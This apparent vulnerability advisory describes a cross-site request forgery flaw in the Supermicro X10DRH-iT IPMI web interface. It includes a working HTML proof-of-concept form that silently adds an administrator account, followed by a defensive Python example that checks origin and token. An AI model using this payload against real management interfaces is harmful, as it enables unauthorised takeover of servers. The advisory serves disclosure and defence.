• metin yunus kandemir

Supermicro IPMI WEBGUI Cross-Site Request Forgery

The web interface of Supermicro X10DRH-iT motherboards with BIOS 2.0a and IPMI firmware 03.40 is vulnerable to cross-site request forgery, which allows remote attackers to add new admin users.

The request that adds a new user with admin privileges does not contain a token parameter.


Assume that the victim user has an authorized session on the Supermicro WEBGUI and visits the attacker's web page containing the following HTML:


<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://SuperMicro-IP/cgi/config_user.cgi" method="POST">
      <input type="hidden" name="username" value="JOKER" />
      <input type="hidden" name="original&#95;username" value="2" />
      <input type="hidden" name="password" value="onebadday" />
      <input type="hidden" name="new&#95;privilege" value="4" />
      <input type="submit" value="submit request" />
    </form>
  </body>
</html>

If the victim user clicks the "submit request" button, the attacker's page will trigger an HTTP request and add a new admin user to the Supermicro WEBGUI.
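The check that the request above is missing, written as an added example (not Supermicro's code and not part of the original advisory): a state-changing request is accepted only if it comes from the interface's own origin and carries a per-session token. The `csrf_token` field name, the HMAC token scheme, the key, the session id and the `bmc.example` / `attacker.example` hosts are assumptions made for illustration.

```python
import hashlib
import hmac
from urllib.parse import urlsplit

SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}

def issue_token(key: bytes, session_id: str) -> str:
    """Per-session token: HMAC-SHA256 over the session id (assumed scheme)."""
    return hmac.new(key, session_id.encode(), hashlib.sha256).hexdigest()

def same_origin(headers: dict, expected_origin: str) -> bool:
    """Check Origin, falling back to Referer, against the interface's own origin."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False  # fail closed when the browser sent neither header
    parts = urlsplit(source)
    return f"{parts.scheme}://{parts.netloc}".lower() == expected_origin.lower()

def check_request(method, headers, form, session_id, key, expected_origin):
    """Return (allowed, reason) for one request to the management interface."""
    if method.upper() in SAFE_METHODS:
        return True, "safe method"
    if not same_origin(headers, expected_origin):
        return False, "cross-origin state change"
    expected = issue_token(key, session_id)
    supplied = form.get("csrf_token", "")  # hypothetical field name
    if not hmac.compare_digest(supplied.encode(), expected.encode()):
        return False, "missing or invalid token"
    return True, "ok"

# Constructed sample data: key, session id and host names are placeholders.
KEY, SESSION, ORIGIN = b"demo-key-not-for-production", "sess-1234", "https://bmc.example"
USER_FIELDS = {"username": "newuser", "original_username": "2",
               "password": "placeholder", "new_privilege": "4"}

def demo():
    """Run the check over a forged cross-site POST and two same-origin POSTs."""
    forged = check_request("POST", {"Origin": "https://attacker.example"},
                           USER_FIELDS, SESSION, KEY, ORIGIN)
    no_token = check_request("POST", {"Origin": ORIGIN}, USER_FIELDS, SESSION, KEY, ORIGIN)
    legit_form = dict(USER_FIELDS, csrf_token=issue_token(KEY, SESSION))
    legit = check_request("POST", {"Referer": ORIGIN + "/"}, legit_form, SESSION, KEY, ORIGIN)
    return forged, no_token, legit

if __name__ == "__main__":
    for result in demo():
        print(result)
```

The same `same_origin` test can be run over reverse-proxy logs to flag POSTs to the management interface that arrive with a foreign `Origin` or `Referer`.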


Proof of Concept Video:







